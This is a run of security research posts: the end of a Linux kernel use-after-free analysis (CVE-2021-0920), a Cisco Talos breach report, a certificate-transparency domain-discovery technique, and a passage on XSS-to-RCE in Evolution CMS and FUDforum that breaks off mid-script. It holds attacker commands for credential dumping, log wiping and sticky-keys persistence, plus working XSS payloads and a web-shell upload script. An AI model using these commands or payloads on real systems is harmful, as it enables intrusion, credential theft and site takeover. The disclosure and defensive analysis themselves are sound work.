| Stage 2: no garbage, return. | | |
| | Call recvmsg with MSG_PEEK flag from f11 to get f10'. | |
| | | Call recvmsg without MSG_PEEK flag from f11 to get f10''. |
| | Call recvmsg with MSG_PEEK flag from f10'. | |
| Everyone is happy. | Everyone is happy. | Everyone is happy. |

However, if the second recvmsg occurs just after stage 1 of the garbage collection process, the UAF is triggered:

| Thread 0 | Thread 1 | Thread 2 |
| --- | --- | --- |
| Call unix_gc. | | |
| Stage 0: list f00, f01, f10, f11, f31, 𝛼 as garbage candidates. | | |
| | Call recvmsg with MSG_PEEK flag from f21 to get f11'. Increase the reference count: scm.fp = scm_fp_dup(UNIXCB(skb).fp); | |
| Stage 0: decrease the inflight count for the children of every garbage candidate. Status after stage 0: inflight(f00) = 0, inflight(f01) = 0, inflight(f10) = 0, inflight(f11) = 1, inflight(f31) = 0, inflight(𝛼) = 0. | | |
| Stage 1: start restoring inflight counts. | Call recvmsg with MSG_PEEK flag from f11 to get f10'. | Call recvmsg without MSG_PEEK flag from f11 to get f10''. unix_detach_fds: UNIXCB(skb).fp = NULL. Blocked by spin_lock(&unix_gc_lock). |
| Stage 1: scan_inflight cannot find candidate children from f11, so the inflight counts accidentally remain the same. | | |
| Stage 2: f00, f01, f10, f31, 𝛼 are garbage. Start purging garbage. | Start calling recvmsg with MSG_PEEK flag from f10', expecting to receive f00'. Get skb = skb_peek(&sk->sk_receive_queue); this skb is about to be freed by thread 0. | |
| Stage 2: the purge loop calls __skb_unlink and kfree_skb. | state->recv_actor(skb, skip, chunk, state) → UAF | |
| GC finished. | | Start garbage collection. Get f10''. |

Therefore, the race condition causes a UAF of the skb object. At first glance, we should blame the second recvmsg syscall because it clears skb.fp, the passed file list. However, if the first recvmsg syscall doesn’t set the MSG_PEEK flag, the UAF can be avoided, because unix_notinflight is serialized with the garbage collection: the kernel makes sure the garbage collection is either not in progress or already finished before decrementing the inflight count and removing the skb. After unix_notinflight, the receiver obtains f11' and the inflight sockets no longer form an unbreakable cycle.

Since MSG_PEEK is not serialized with the garbage collection, when recvmsg is called with MSG_PEEK set, the kernel still considers f11 a garbage candidate. For this reason, the next recvmsg call will eventually trigger the bug due to the inconsistent state of the garbage collection process.
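The MSG_PEEK behavior at the core of this bug is easy to observe (safely) from userspace: peeking installs a brand-new descriptor while leaving the skb queued, so the same SCM_RIGHTS datagram can be received again. A sketch:

```python
import array
import os
import socket

def recv_fd(sock, flags=0):
    # Receive one descriptor from an SCM_RIGHTS control message.
    msg, anc, mflags, addr = sock.recvmsg(1, socket.CMSG_SPACE(4), flags)
    fd_arr = array.array("i")
    fd_arr.frombytes(anc[0][2][:4])
    return fd_arr[0]

a, b = socket.socketpair()
r, w = os.pipe()

fds = array.array("i", [r])
a.sendmsg([b"x"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, fds.tobytes())])

peeked = recv_fd(b, socket.MSG_PEEK)  # new fd installed, skb stays queued
normal = recv_fd(b)                   # consumes the skb, another new fd

# Both descriptors reference the same pipe read end.
os.write(w, b"okok")
d1 = os.read(peeked, 2)
d2 = os.read(normal, 2)
print(d1, d2)  # → b'ok' b'ok'
```

On a patched kernel both calls behave exactly like this; the vulnerability was never about the userspace-visible result, but about the unsynchronized reference-count update the peek performs internally.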
# Patch Analysis

## CVE-2021-0920 was found in 2016

The vulnerability was initially reported to the Linux kernel community in 2016. The researcher also provided correct patch advice, but it was not accepted by the Linux kernel community:

*Figure: the patch was not applied in 2016*

In theory, anyone who saw this patch could have come up with an exploit against the faulty garbage collector.

## Patch in 2021

Let’s check the official patch for CVE-2021-0920. For the MSG_PEEK branch, it takes the garbage collection lock unix_gc_lock before performing sensitive actions and immediately releases it afterwards:

```c
	…
+	spin_lock(&unix_gc_lock);
+	spin_unlock(&unix_gc_lock);
	…
```

The patch looks confusing at first: it is rare to see a lock acquired and released immediately, with nothing in between. Regardless, the MSG_PEEK path now waits for the garbage collector to complete, so the UAF issue is resolved.

## BUG_ON Added in 2017

In 2017, Andrey Ulanov from Google found another issue in unix_gc and provided a fix commit. Additionally, the patch added a BUG_ON for the inflight count:

```c
 void unix_notinflight(struct user_struct *user, struct file *fp)
 	if (s) {
 		struct unix_sock *u = unix_sk(s);

+		BUG_ON(!atomic_long_read(&u->inflight));
 		BUG_ON(list_empty(&u->link));

 		if (atomic_long_dec_and_test(&u->inflight))
```

At first glance, it seems that this BUG_ON could prevent CVE-2021-0920 from being exploitable. However, if the exploit code can delay garbage collection by crafting a large amount of fake garbage, it can bypass the BUG_ON check with a heap spray.

## New Garbage Collection Issue Discovered in 2021

CVE-2021-4083 deserves an honorable mention: when I discussed CVE-2021-0920 with Jann Horn and Ben Hawkes, Jann found another issue in the garbage collection, described in the Project Zero blog post Racing against the clock -- hitting a tiny kernel race window.

# Part I Conclusion

To recap, we have discussed the kernel internals of SCM_RIGHTS and the design and implementation of the Linux kernel garbage collector.
In addition, we have analyzed the behavior of the MSG_PEEK flag with the recvmsg syscall and how it leads to a kernel UAF through a subtle and arcane race condition.

The bug was spotted publicly in 2016, but unfortunately the Linux kernel community did not accept the patch at that time. Any threat actor who saw the public email thread could have developed an LPE exploit against the Linux kernel.

In part two, we'll look at how the vulnerability was exploited and the functionality of the post-compromise modules.

# Cisco Talos shares insights related to recent cyber attack on Cisco

10 August 2022 at 19:30

## Update History

| Date | Description of Updates |
| --- | --- |
| Aug. 10th 2022 | Adding clarifying details on activity involving Active Directory. |
| Aug. 10th 2022 | Update made to the Cisco Response and Recommendations section related to MFA. |

## Executive summary

• On May 24, 2022, Cisco became aware of a potential compromise. Since that point, Cisco Security Incident Response (CSIRT) and Cisco Talos have been working to remediate.
• During the investigation, it was determined that a Cisco employee’s credentials were compromised after an attacker gained control of a personal Google account where credentials saved in the victim’s browser were being synchronized.
• The attacker conducted a series of sophisticated voice phishing attacks under the guise of various trusted organizations attempting to convince the victim to accept multi-factor authentication (MFA) push notifications initiated by the attacker. The attacker ultimately succeeded in achieving an MFA push acceptance, granting them access to VPN in the context of the targeted user.
• CSIRT and Talos are responding to the event and we have not identified any evidence suggesting that the attacker gained access to critical internal systems, such as those related to product development, code signing, etc.
• After obtaining initial access, the threat actor conducted a variety of activities to maintain access, minimize forensic artifacts, and increase their level of access to systems within the environment.
• The threat actor was successfully removed from the environment and displayed persistence, repeatedly attempting to regain access in the weeks following the attack; however, these attempts were unsuccessful.
• We assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to the UNC2447 cybercrime gang, Lapsus$ threat actor group, and Yanluowang ransomware operators.
• For further information see the Cisco Response page here.

## Initial vector

Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employee’s personal Google account. The user had enabled password syncing via Google Chrome and had stored their Cisco credentials in their browser, enabling that information to synchronize to their Google account. After obtaining the user’s credentials, the attacker attempted to bypass multifactor authentication (MFA) using a variety of techniques, including voice phishing (aka "vishing") and MFA fatigue, the process of sending a high volume of push requests to the target’s mobile device until the user accepts, either accidentally or simply to attempt to silence the repeated push notifications they are receiving. Vishing is an increasingly common social engineering technique whereby attackers try to trick employees into divulging sensitive information over the phone. In this instance, an employee reported that they received multiple calls over several days in which the callers – who spoke in English with various international accents and dialects – purported to be associated with support organizations trusted by the user.

Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated successfully to the Cisco VPN. The attacker then escalated to administrative privileges, allowing them to login to multiple systems, which alerted our Cisco Security Incident Response Team (CSIRT), who subsequently responded to the incident. The actor in question dropped a variety of tools, including remote access tools like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket, and added their own backdoor accounts and persistence mechanisms.

## Post-compromise TTPs

Following initial access to the environment, the threat actor conducted a variety of activities for the purposes of maintaining access, minimizing forensic artifacts, and increasing their level of access to systems within the environment.

Once on a system, the threat actor began to enumerate the environment, using common built-in Windows utilities to identify the user and group membership configuration of the system, hostname, and identify the context of the user account under which they were operating. We periodically observed the attacker issuing commands containing typographical errors, indicating manual operator interaction was occurring within the environment.

After establishing access to the VPN, the attacker then began to use the compromised user account to logon to a large number of systems before beginning to pivot further into the environment. They moved into the Citrix environment, compromising a series of Citrix servers and eventually obtained privileged access to domain controllers.

After obtaining access to the domain controllers, the attacker began attempting to dump NTDS from them using “ntdsutil.exe” consistent with the following syntax:
powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\users\public' q q
They then worked to exfiltrate the dumped NTDS over SMB (TCP/445) from the domain controller to the VPN system under their control.

After obtaining access to credential databases, the attacker was observed leveraging machine accounts for privileged authentication and lateral movement across the environment.

Consistent with activity we previously observed in other separate but similar attacks, the adversary created an administrative user called “z” on the system using the built-in Windows “net.exe” commands. This account was then added to the local Administrators group. We also observed instances where the threat actor changed the password of existing local user accounts to the same value shown below. Notably, we have observed the creation of the “z” account by this actor in previous engagements prior to the Russian invasion of Ukraine.
C:\Windows\system32\net user z Lh199211* /add
C:\Windows\system32\net localgroup administrators z /add
This account was then used in some cases to execute additional utilities, such as adfind or secretsdump, to attempt to enumerate the directory services environment and obtain additional credentials. Additionally, the threat actor was observed attempting to extract registry information, including the SAM database, on compromised Windows hosts.
reg save hklm\system system
reg save hklm\sam sam
reg save HKLM\security sec
On some systems, the attacker was observed employing MiniDump from Mimikatz to dump LSASS.
tasklist | findstr lsass
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [LSASS_PID] C:\windows\temp\lsass.dmp full
The attacker also took steps to remove evidence of activities performed on compromised systems by deleting the previously created local Administrator account. They also used the “wevtutil.exe” utility to identify and clear event logs generated on the system.
wevtutil.exe el
wevtutil.exe cl [LOGNAME]
In many cases, we observed the attacker removing the previously created local administrator account.
net user z /delete
To move files between systems within the environment, the threat actor often leveraged Remote Desktop Protocol (RDP) and Citrix. We observed them modifying the host-based firewall configurations to enable RDP access to systems.
netsh advfirewall firewall set rule group=remote desktop new enable=Yes
C:\Windows\System32\msiexec.exe /i C:\Users\[USERNAME]\Pictures\LogMeIn.msi
The attacker frequently leveraged Windows logon bypass techniques to maintain the ability to access systems in the environment with elevated privileges. They frequently relied upon PSEXESVC.exe to remotely add the following Registry key values:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f
This enabled the attacker to leverage the accessibility features present on the Windows logon screen to spawn a SYSTEM level command prompt, granting them complete control of the systems. In several cases, we observed the attacker adding these keys but not further interacting with the system, possibly as a persistence mechanism to be used later as their primary privileged access is revoked.

Throughout the attack, we observed attempts to exfiltrate information from the environment. We confirmed that the only successful data exfiltration that occurred during the attack included the contents of a Box folder that was associated with a compromised employee’s account and employee authentication data from Active Directory. The Box data obtained by the adversary in this case was not sensitive.

In the weeks following the eviction of the attacker from the environment, we observed continuous attempts to re-establish access. In most cases, the attacker was observed targeting weak password rotation hygiene following mandated employee password resets. They primarily targeted users who they believed would have made single character changes to their previous passwords, attempting to leverage these credentials to authenticate and regain access to the Cisco VPN. The attacker was initially leveraging traffic anonymization services like Tor; however, after experiencing limited success, they switched to attempting to establish new VPN sessions from residential IP space using accounts previously compromised during the initial stages of the attack. We also observed the registration of several additional domains referencing the organization while responding to the attack and took action on them before they could be used for malicious purposes.

After being successfully removed from the environment, the adversary also repeatedly attempted to establish email communications with executive members of the organization but did not make any specific threats or extortion demands. In one email, they included a screenshot showing the directory listing of the Box data that was previously exfiltrated as described earlier. Below is a screenshot of one of the received emails. The adversary redacted the directory listing screenshot prior to sending the email.

## Backdoor analysis

The actor dropped a series of payloads onto systems, which we continue to analyze. The first payload is a simple backdoor that takes commands from a command and control (C2) server and executes them on the end system via the Windows Command Processor. The commands are sent in JSON blobs and are standard for a backdoor. There is a “DELETE_SELF” command that removes the backdoor from the system completely. Another, more interesting, command, “WIPE”, instructs the backdoor to remove the last executed command from memory, likely with the intent of negatively impacting forensic analysis on any impacted hosts.

Commands are retrieved by making HTTP GET requests to the C2 server using the following structure:
/bot/cmd.php?botid=%.8x
The malware also communicates with the C2 server via HTTP GET requests that feature the following structure:
/bot/gate.php?botid=%.8x
Following the initial request from the infected system, the C2 server responds with a SHA256 hash. We observed additional requests made every 10 seconds.
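For log hunting, the request structures above can be matched mechanically. A minimal sketch follows; the bot id value is an arbitrary illustrative number, and nothing beyond the `%.8x` format string is taken from the malware itself:

```python
# Sketch: reproducing the backdoor's C2 request paths for log hunting.
# The "%.8x" format yields exactly eight lowercase hex digits.
import re

def c2_paths(botid: int) -> tuple:
    """Return the command-polling and gate request paths for a given bot id."""
    return ("/bot/cmd.php?botid=%.8x" % botid,
            "/bot/gate.php?botid=%.8x" % botid)

# Regex for spotting either endpoint in proxy or web-server logs.
C2_RE = re.compile(r"/bot/(?:cmd|gate)\.php\?botid=[0-9a-f]{8}$")
```

Combined with the fixed 10-second polling interval, a regular cadence of hits on these paths is a strong beacon indicator.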

The aforementioned HTTP requests are sent using the following user-agent string:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.36 Trailer/95.3.1132.33
The malware also creates a file called “bdata.ini” in the malware’s current working directory that contains a value derived from the volume serial number present on the infected system. In instances where this backdoor was executed, the malware was observed running from the following directory location:
C:\users\public\win\cmd.exe
The attacker was frequently observed staging tooling in directory locations under the Public user profile on systems from which they were operating.

Based upon analysis of C2 infrastructure associated with this backdoor, we assess that the C2 server was set up specifically for this attack.

Based upon artifacts obtained, tactics, techniques, and procedures (TTPs) identified, infrastructure used, and a thorough analysis of the backdoor utilized in this attack, we assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to both UNC2447 and Lapsus$. IABs typically attempt to obtain privileged access to corporate network environments and then monetize that access by selling it to other threat actors who can then leverage it for a variety of purposes. We have also observed previous activity linking this threat actor to the Yanluowang ransomware gang, including the use of the Yanluowang data leak site for posting data stolen from compromised organizations.

UNC2447 is a financially motivated threat actor with a nexus to Russia that has been previously observed conducting ransomware attacks and leveraging a technique known as “double extortion,” in which data is exfiltrated prior to ransomware deployment in an attempt to coerce victims into paying ransom demands. Prior reporting indicates that UNC2447 has been observed operating a variety of ransomware, including FIVEHANDS, HELLOKITTY, and more.

Apart from UNC2447, some of the TTPs discovered during the course of our investigation match those of Lapsus$, a threat actor group reported to have been responsible for several notable breaches of corporate environments. Several arrests of Lapsus$ members were reported earlier this year. Lapsus$ has been observed compromising corporate environments and attempting to exfiltrate sensitive information.

While we did not observe ransomware deployment in this attack, the TTPs used were consistent with “pre-ransomware activity,” activity commonly observed leading up to the deployment of ransomware in victim environments. Many of the TTPs observed are consistent with activity observed by CTIR during previous engagements.
Our analysis also suggests reuse of server-side infrastructure associated with these previous engagements as well. In previous engagements, we also did not observe deployment of ransomware in the victim environments.

## Cisco response and recommendations

Cisco implemented a company-wide password reset immediately upon learning of the incident. CTIR previously observed similar TTPs in numerous investigations since 2021. Our findings and subsequent security protections resulting from those customer engagements helped us slow and contain the attacker’s progression. We created two ClamAV signatures, which are listed below.

• Win.Exploit.Kolobko-9950675-0
• Win.Backdoor.Kolobko-9950676-0

Threat actors commonly use social engineering techniques to compromise targets, and despite the frequency of such attacks, organizations continue to face challenges mitigating those threats. User education is paramount in thwarting such attacks, including making sure employees know the legitimate ways that support personnel will contact users so that employees can identify fraudulent attempts to obtain sensitive information.

Given the actor’s demonstrated proficiency in using a wide array of techniques to obtain initial access, user education is also a key part of countering MFA bypass techniques. Equally important to implementing MFA is ensuring that employees are educated on what to do and how to respond if they get errant push requests on their phones. It is also essential to educate employees about who to contact if such incidents do arise, to help determine if the event was a technical issue or malicious. For Duo, it is beneficial to implement strong device verification by enforcing stricter controls around device status to limit or block enrollment and access from unmanaged or unknown devices.
Additionally, leveraging risk detection to highlight events like a brand-new device being used from an unrealistic location, or attack patterns like login brute-forcing, can help detect unauthorized access.

Prior to allowing VPN connections from remote endpoints, ensure that posture checking is configured to enforce a baseline set of security controls. This ensures that the connecting devices match the security requirements present in the environment. It can also prevent rogue devices that have not been previously approved from connecting to the corporate network environment.

Network segmentation is another important security control that organizations should employ, as it provides enhanced protection for high-value assets and also enables more effective detection and response capabilities in situations where an adversary is able to gain initial access into the environment.

Centralized log collection can help minimize the lack of visibility that results when an attacker takes active steps to remove logs from systems. Ensuring that the log data generated by endpoints is centrally collected and analyzed for anomalous or overtly malicious behavior can provide early indication when an attack is underway.

In many cases, threat actors have been observed targeting the backup infrastructure in an attempt to further remove an organization’s ability to recover following an attack. Ensuring that backups are offline and periodically tested can help mitigate this risk and ensure an organization’s ability to effectively recover following an attack.

Auditing of command line execution on endpoints can also provide increased visibility into actions being performed on systems in the environment and can be used to detect suspicious execution of built-in Windows utilities, which is commonly observed during intrusions where threat actors rely on benign applications or utilities already present in the environment for enumeration, privilege escalation, and lateral movement activities.
## MITRE ATT&CK mapping

All of the previously described TTPs observed in this attack map to the following phases: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Lateral Movement, Discovery, Command and Control, and Exfiltration.

## Indicators of compromise

The following indicators of compromise were observed associated with this attack.

### Hashes (SHA256)

184a2570d71eedc3c77b63fd9d2a066cd025d20ceef0f75d428c6f7e5c6965f3
2fc5bf9edcfa19d48e235315e8f571638c99a1220be867e24f3965328fe94a03
542c9da985633d027317e9a226ee70b4f0742dcbc59dfd2d4e59977bb870058d
61176a5756c7b953bc31e5a53580d640629980a344aa5ff147a20fb7d770b610
753952aed395ea845c52e3037f19738cfc9a415070515de277e1a1baeff20647
8df89eef51cdf43b2a992ade6ad998b267ebb5e61305aeb765e4232e66eaf79a
8e5733484982d0833abbd9c73a05a667ec2d9d005bbf517b1c8cd4b1daf57190
99be6e7e31f0a1d7eebd1e45ac3b9398384c1f0fa594565137abb14dc28c8a7f
bb62138d173de997b36e9b07c20b2ca13ea15e9e6cd75ea0e8162e0d3ded83b7
eb3452c64970f805f1448b78cd3c05d851d758421896edd5dfbe68e08e783d18

### IP Addresses

104.131.30[.]201
108.191.224[.]47
131.150.216[.]118
134.209.88[.]140
138.68.227[.]71
139.177.192[.]145
139.60.160[.]20
139.60.161[.]99
143.198.110[.]248
143.198.131[.]210
159.65.246[.]188
161.35.137[.]163
162.33.177[.]27
162.33.178[.]244
162.33.179[.]17
165.227.219[.]211
165.227.23[.]218
165.232.154[.]73
166.205.190[.]23
167.99.160[.]91
172.56.42[.]39
172.58.220[.]52
172.58.239[.]34
174.205.239[.]164
176.59.109[.]115
178.128.171[.]206
185.220.100[.]244
185.220.101[.]10
185.220.101[.]13
185.220.101[.]15
185.220.101[.]16
185.220.101[.]2
185.220.101[.]20
185.220.101[.]34
185.220.101[.]45
185.220.101[.]6
185.220.101[.]65
185.220.101[.]73
185.220.101[.]79
185.220.102[.]242
185.220.102[.]250
192.241.133[.]130
194.165.16[.]98
195.149.87[.]136
24.6.144[.]43
45.145.67[.]170
45.227.255[.]215
45.32.141[.]138
45.32.228[.]189
45.32.228[.]190
45.55.36[.]143
45.61.136[.]207
45.61.136[.]5
45.61.136[.]83
46.161.27[.]117
5.165.200[.]7
52.154.0[.]241
64.227.0[.]177
64.4.238[.]56
65.188.102[.]43
66.42.97[.]210
67.171.114[.]251
68.183.200[.]63
68.46.232[.]60
73.153.192[.]98
74.119.194[.]203
74.119.194[.]4
76.22.236[.]142
82.116.32[.]77
87.251.67[.]41
94.142.241[.]194

### Domains

cisco-help[.]cf
cisco-helpdesk[.]cf
ciscovpn1[.]com
ciscovpn2[.]com
ciscovpn3[.]com
devcisco[.]com
devciscoprograms[.]com
helpzonecisco[.]com
kazaboldu[.]net
mycisco[.]cf
mycisco[.]gq
mycisco-helpdesk[.]ml
primecisco[.]com
pwresetcisco[.]com

### Email Addresses

costacancordia[@]protonmail[.]com

# Discovering Domains via a Timing Attack on Certificate Transparency

9 August 2022 at 11:29

Many modern websites employ automatic issuance and renewal of TLS certificates. For enterprises, there are DigiCert services. For everyone else, there are free services such as Let’s Encrypt and ZeroSSL.

There is a flaw in the way that deployment of TLS certificates might be set up: it allows anyone to discover all domain names used by the same server. Sometimes, even when there is no HTTPS there!

In this article, I describe a new technique for discovering domain names. Afterward, I show how to use it in threat intelligence, penetration testing, and bug bounty.

## Quick Overview

Certificate Transparency (CT) is an Internet security standard for monitoring and auditing the issuance of TLS certificates. It creates a system of public logs that seek to record all certificates issued by publicly trusted certificate authorities (CAs).

To search through CT logs, the Crt.sh or Censys services are usually used. Censys also adds certificates from its scan results to the database.

It’s already known that by looking through CT logs it’s possible to discover obscure subdomains, or to discover brand-new domains with CMS installation scripts still available. There is much more to it.
Sometimes the following or an equivalent configuration is set up on the server:

# /etc/crontab
37 13 */10 * * certbot renew --post-hook "systemctl reload nginx"

This configuration means that certificates for all of the host’s domains are renewed at the same time. Therefore, by a timing attack on certificate transparency, we can discover all these domains! Let’s see how this can be applied in practice.

## A Real Case Scenario: Let’s Encrypt

A month ago, I tried to download dnSpy, and I discovered a malicious dnSpy website. I sent several abuse reports, and I was able to get it blocked in just 2 hours:

Be aware, dnSpy .NET Debugger / Assembly Editor has been trojaned again! In Google’s TOP 2, there was a malicious site maintained by threat actors, who also distributed infected CPU-Z, Notepad++, MinGW, and many more. Thanks to NameSilo, the domain has been deactivated! pic.twitter.com/EdTlFjtN4B

— Arseniy Sharoglazov (@_mohemiv) July 8, 2022

I found quite a lot of information online about the threat actors who created this website. For example, there is an article in Bleeping Computer and detailed research from Colin Cowie. In short, a person or a group of people create malicious websites mimicking legitimate ones. The websites distribute infected software, both commercial and open source. Affected software includes, but is not limited to, Burp Suite, Minecraft, Tor Browser, dnSpy, OBS Studio, CPU-Z, Notepad++, MinGW, Cygwin, and XAMPP.

I wasn’t willing to put up with the fact that someone trojans cool open source projects like OBS Studio or MinGW, and I decided to take matters into my own hands.

###### Long Story Short

I sent more than 20 abuse reports, and I was able to shut down a lot of the threat actors’ infrastructure.

It isn’t easy to confront these threat actors. They purchase domains from different registrars using different accounts. Next, they use an individual account for each domain on Cloudflare to proxy all traffic to the destination server.
Finally, they wait for some time before putting malicious content on the site, or they hide it under long URLs.

Some of the domains controlled by the threat actors are known from Twitter: cpu-z[.]org, gpu-z[.]org, blackhattools[.]net, obsproject[.]app, notepadd[.]net, codenote[.]org, minecraftfree[.]net, minecraft-java[.]com, apachefriends[.]co, ...

The question is how to discover other domains of the threat actors. Other domains may have nothing in common, and each of them would refer to Cloudflare. This is where our timing attack on certificate transparency comes into play.

Take a look at one of the certificates for the known domain cpu-z[.]net, used by the threat actors. This certificate has the validity start field equal to 2022-07-23 13:59:54. Let’s utilize the parsed.validity.start filter to look for certificates that were issued a few seconds later.

Here it is! We just discovered a domain that wasn’t known before! Let’s open a website with this domain.

This is exactly what we were looking for! Earlier, I was able to disclose the real IP address of cpu-z[.]org. This IP address belonged to Hawk Host, and after my abuse report to them, all websites of the threat actors on Hawk Host started to show this exact page. This proves that we discovered a domain managed by the same threat actors.

A few pages later, a domain blazefiles[.]net can be found, which distributed infected Adobe products. It also displays the same Hawk Host page. There are a lot more domains used by these threat actors, so let’s just move on.

###### Why did the technique work?

The threat actors set up their websites with software such as Plesk, cPanel, or CyberPanel. This software was automatically issuing and renewing trusted certificates for all websites, even though these certificates were never needed.
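The correlation step at the heart of the technique can be sketched in a few lines. The candidate domains and timestamps below are made-up illustrative data, and the 10-second window is an arbitrary choice, not a value from the article:

```python
# Sketch: group certificates whose issuance times fall within a small
# window of a known certificate's validity-start timestamp.
from datetime import datetime, timedelta

def correlated(known, candidates, window=timedelta(seconds=10)):
    """Return domains whose certificate issuance time lies within
    `window` of the known certificate's issuance time."""
    return sorted(d for d, t in candidates.items() if abs(t - known) <= window)

# Validity start of the known certificate (cpu-z[.]net, from the article).
known = datetime(2022, 7, 23, 13, 59, 54)

# Hypothetical candidates pulled from a CT log search.
candidates = {
    "related.example":   datetime(2022, 7, 23, 13, 59, 57),  # 3 s later
    "unrelated.example": datetime(2022, 7, 23, 18, 0, 0),    # hours later
}
```

Certificates renewed by the same cron job cluster within seconds of each other, so only `related.example` survives the filter.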
If we try to search for cpu-z[.]org certificates, we would see a bunch of unneeded certificates issued by the hosting servers. All of these certificates can be dug up from certificate transparency logs and correlated with other certificates by their timestamps.

## DigiCert and Other CAs

DigiCert services are used by large companies for the automatic issuance of TLS certificates. The validity field of DigiCert certificates doesn’t contain the time when the certificate was issued. The same is true for some other certificate authorities, for example, ZeroSSL.

However, if we look at crt.sh’s representation of transparency logs, we would see that crt.sh IDs of certificates owned by the same company may sit quite close to each other. This means that even when a CA doesn’t include the exact issuing time in certificates, the certificates issued at the same time can still be discovered.

Additionally, you may find two types of certificates in the logs: precertificates and leaf certificates. If you have access to the leaf certificate, you can take a look at the signed certificate timestamp (SCT) field in it. The SCT field should always contain a timestamp, even when the time in the validity field is 00:00:00.

## What’s Next

Probably, some kind of tooling is needed to help with discovering domains by this technique. Possible ways to correlate domains include:

• Analyzing certificates with close issuance times
• Analyzing certificates with close timestamps in the SCT field
• Analyzing certificates that come close to each other in CT logs
• Analyzing time periods between known certificates
• Analyzing certificates issued after a round period of time from the known timestamps
• Getting an intersection for sets of certificates issued close in time to the known timestamps
• The same, but for sets of certificates that come close to each other in CT logs

Regarding mitigation, regularly inspect CT logs for your domains.
You may discover not only domains affected by attacks on CT, but also certificates issued by threat actors attacking your infrastructure.

Feel free to comment on this article on our Twitter. Follow @ptswarm or @_mohemiv so you don’t miss our future research and other publications.

# Researching Open Source apps for XSS to RCE flaws

28 July 2022 at 13:54

Cross-Site Scripting (XSS) is one of the most commonly encountered attacks in web applications. If an attacker can inject JavaScript code into the application output, this can lead not only to cookie theft, redirection or phishing, but also, in some cases, to a complete compromise of the system.

In this article I’ll show how to achieve Remote Code Execution via XSS using the examples of Evolution CMS, FUDForum, and GitBucket.

## Evolution CMS v3.1.8

Link: https://github.com/evolution-cms/evolution
CVE: Pending

Evolution CMS describes itself as the world’s fastest and most customizable open source PHP CMS.

In Evolution CMS, I discovered an unescaped display of user-controlled data, which leads to the possibility of reflected XSS attacks. I will give an example of a link with a payload:

https://192.168.1.76/manager/?a=35&id=1%22%3E%3Cimg%20src=1%20onerror=alert(document.domain)%3E

If an administrator authorized in the system follows the link or clicks on it, the JavaScript code will be executed in the administrator’s browser.

In the admin panel of Evolution CMS, in the file manager section, the administrator can upload files. The problem is that the file manager cannot upload php files; however, it can edit existing ones. Here is an example of JavaScript code that will overwrite the index.php file with a call to the phpinfo() function:

$.get('/manager/?a=31', function(d) {
    let p = $(d).contents().find('input[name="path"]').val();
    $.ajax({
        url: '/manager/index.php',
        type: 'POST',
        contentType: 'application/x-www-form-urlencoded',
        data: 'a=31&mode=save&path=' + p + '/index.php&content=<?php phpinfo(); ?>'
    });
});


It’s time to combine the payload and the JavaScript code described above, which, as an example, can be encoded in Base64:

https://192.168.1.76/manager/?a=35&id=1%22%3E%3Cimg%20src=1%20onerror=eval(atob(%27JC5nZXQoJy9tYW5hZ2VyLz9hPTMxJyxmdW5jdGlvbihkKXtsZXQgcCA9ICQoZCkuY29udGVudHMoKS5maW5kKCdpbnB1dFtuYW1lPSJwYXRoIl0nKS52YWwoKTskLmFqYXgoe3VybDonL21hbmFnZXIvaW5kZXgucGhwJyx0eXBlOidQT1NUJyxjb250ZW50VHlwZTonYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkJyxkYXRhOidhPTMxJm1vZGU9c2F2ZSZwYXRoPScrcCsnL2luZGV4LnBocCZjb250ZW50PTw/cGhwIHBocGluZm8oKTsgPz4nfSk7fSk7%27))%3E
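As a cross-check, the Base64 wrapping used in such links is easy to reproduce. The sketch below uses a shortened stand-in payload, not the exact JavaScript from the article; `eval(atob('...'))` in the victim's browser reverses the encoding:

```python
# Sketch: producing a Base64-wrapped XSS payload and URL-encoding it into a link.
import base64
import urllib.parse

# Shortened stand-in for the index.php-overwriting payload shown earlier.
js = "$.get('/manager/?a=31',function(d){/* ... */});"

# This is what atob() will decode inside the onerror handler.
b64 = base64.b64encode(js.encode()).decode()

# Break out of the attribute, then eval the decoded payload.
xss = '1"><img src=1 onerror=eval(atob(\'' + b64 + '\'))>'
link = "https://192.168.1.76/manager/?a=35&id=" + urllib.parse.quote(xss)
```

Encoding the payload this way sidesteps quoting and escaping problems in the injected attribute context.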

In case of a successful attack on an administrator authorized in the system, the index.php file will be overwritten with the code that the attacker placed in the payload. In this case, that is a call to the phpinfo() function:

## FUDforum v3.1.1

CVE: Pending

FUDforum is a super fast and scalable discussion forum. It is highly customizable and supports unlimited members, forums, posts, topics, polls, and attachments.

In FUDforum, I found an unescaped display of user-controlled data in the name of an attachment in a private message or forum topic, which allows an attacker to perform a stored XSS attack: attach and upload a file with the name <img src=1 onerror=alert()>.png . Once this file is downloaded, the JavaScript code will be executed in the browser:

The FUDforum admin panel has a file manager that allows you to upload files to the server, including files with the php extension.

An attacker can use stored XSS to upload a php file that can execute any command on the server.

There is already a public exploit for FUDforum, which uses JavaScript code to upload a php file on behalf of the administrator:

const action = '/adm/admbrowse.php';

function uploadShellWithCSRFToken(csrf) {
    let cur = '/var/www/html/fudforum.loc';
    let boundary = "-----------------------------347796892242263418523552968210";
    let contentType = "application/x-php";
    let fileName = 'shell.php';
    let fileData = "<?=$_GET[cmd]?>";
    let xhr = new XMLHttpRequest();
    xhr.open('POST', action, true);
    xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=" + boundary);
    let body = "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="cur"\r\n\r\n';
